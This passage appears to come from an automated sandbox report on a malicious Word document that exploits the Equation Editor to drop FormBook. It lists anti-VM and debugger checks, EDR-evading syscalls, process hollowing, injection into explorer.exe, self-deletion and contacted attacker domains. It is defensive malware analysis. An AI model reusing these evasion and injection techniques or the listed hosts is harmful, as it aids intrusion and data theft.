      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrAPI/Special instruction interceptor: Address: 7731BECA
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrAPI/Special instruction interceptor: Address: 7731D51A
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrAPI/Special instruction interceptor: Address: 7731D26A
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrAPI/Special instruction interceptor: Address: 7731C18A
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrAPI/Special instruction interceptor: Address: 7731C25A
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrAPI/Special instruction interceptor: Address: 7731BE2A
      Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7731BECA
      Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7731D51A
      Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7731C1DA
      Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7731BFBA
      Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7731BFDA
      Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7731BE2A
      Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7731D26A
      Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7731C18A
      Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7731C25A
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 89904 second address: 8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 89B7E second address: 89B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrMemory allocated: 240000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrMemory allocated: 2240000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrMemory allocated: 5D0000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00970101 rdtsc 11_2_00970101
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 1482Jump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeWindow / User API: threadDelayed 9837Jump to behavior
      Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_13-13995
      Source: C:\Windows\SysWOW64\wlanext.exeAPI coverage: 7.2 %
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3176Thread sleep time: -180000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr TID: 3236Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 1340Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 1344Thread sleep count: 97 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exe TID: 3476Thread sleep count: 133 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exe TID: 3476Thread sleep time: -266000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exe TID: 3476Thread sleep count: 9837 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exe TID: 3476Thread sleep time: -19674000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrThread delayed: delay time: 922337203685477Jump to behavior
      Source: explorer.exe, 0000000D.00000000.400671718.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
      Source: explorer.exe, 0000000D.00000002.924123872.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: explorer.exe, 0000000D.00000002.924123872.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: explorer.exe, 0000000D.00000002.924123872.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
      Source: explorer.exe, 0000000D.00000002.923839684.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
      Source: explorer.exe, 0000000D.00000002.924123872.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00970101 rdtsc 11_2_00970101
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009200C4 NtCreateFile,LdrInitializeThunk,11_2_009200C4
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00910080 mov ecx, dword ptr fs:[00000030h]11_2_00910080
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009100EA mov eax, dword ptr fs:[00000030h]11_2_009100EA
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009326F8 mov eax, dword ptr fs:[00000030h]11_2_009326F8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020526F8 mov eax, dword ptr fs:[00000030h]14_2_020526F8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C10449 GetProcessHeap,HeapFree,14_2_00C10449
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C08F8B SetUnhandledExceptionFilter,14_2_00C08F8B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C08F22 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00C08F22
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeDomain query: www.cnoszirzbkaqz.com
      Source: C:\Windows\explorer.exeDomain query: www.onlynaturlpt.shop
      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.89.47 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 156.241.141.214 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.turbrun.com
      Source: C:\Windows\explorer.exeNetwork Connect: 5.149.161.103 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.outletivo.com
      Source: C:\Windows\explorer.exeNetwork Connect: 15.197.148.33 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.naddafornadda.com
      Source: C:\Windows\explorer.exeNetwork Connect: 192.243.61.227 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.wirewizardselectric.net
      Source: C:\Windows\explorer.exeDomain query: www.wzxq.xyz
      Source: C:\Windows\explorer.exeNetwork Connect: 167.172.228.26 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.380747.net
      Source: C:\Windows\explorer.exeDomain query: www.texanboxes.com
      Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.emeraldsurrogatefabric.com
      .NET source code references suspicious native API functions
      Source: 10.2.nelb82019.scr.22997ac.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
      Source: 10.2.nelb82019.scr.22997ac.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
      Source: 10.2.nelb82019.scr.22997ac.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
      Found direct / indirect Syscall (likely to bypass EDR)
      Source: C:\Windows\SysWOW64\wlanext.exeNtMapViewOfSection: Indirect: 0xA49D47Jump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeNtQueueApcThread: Indirect: 0xA4A531Jump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrNtQueueApcThread: Indirect: 0x2AA4F2Jump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeNtClose: Indirect: 0xA49DC5
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrNtClose: Indirect: 0x2AA56C
      Source: C:\Windows\SysWOW64\wlanext.exeNtUnmapViewOfSection: Indirect: 0xA49DB9Jump to behavior
      Injects a PE file into a foreign processes
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrMemory written: C:\Users\user\AppData\Roaming\nelb82019.scr base: 400000 value starts with: 4D5AJump to behavior
      Maps a DLL or memory area into another process
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrSection loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrSection loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrThread register set: target process: 1244Jump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 1244Jump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Sample uses process hollowing technique
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: C00000Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\nelb82019.scr "C:\Users\user\AppData\Roaming\nelb82019.scr"Jump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess created: C:\Users\user\AppData\Roaming\nelb82019.scr "C:\Users\user\AppData\Roaming\nelb82019.scr"Jump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\nelb82019.scr"Jump to behavior
      Source: explorer.exe, 0000000D.00000002.923496286.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.400671718.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman-
      Source: explorer.exe, 0000000D.00000002.923627377.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.401556901.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 0000000D.00000002.923627377.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.401556901.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 0000000D.00000002.923627377.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.401556901.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrQueries volume information: C:\Users\user\AppData\Roaming\nelb82019.scr VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C09186 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,14_2_00C09186
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C088EE EnterCriticalSection,RpcServerListen,LeaveCriticalSection,14_2_00C088EE
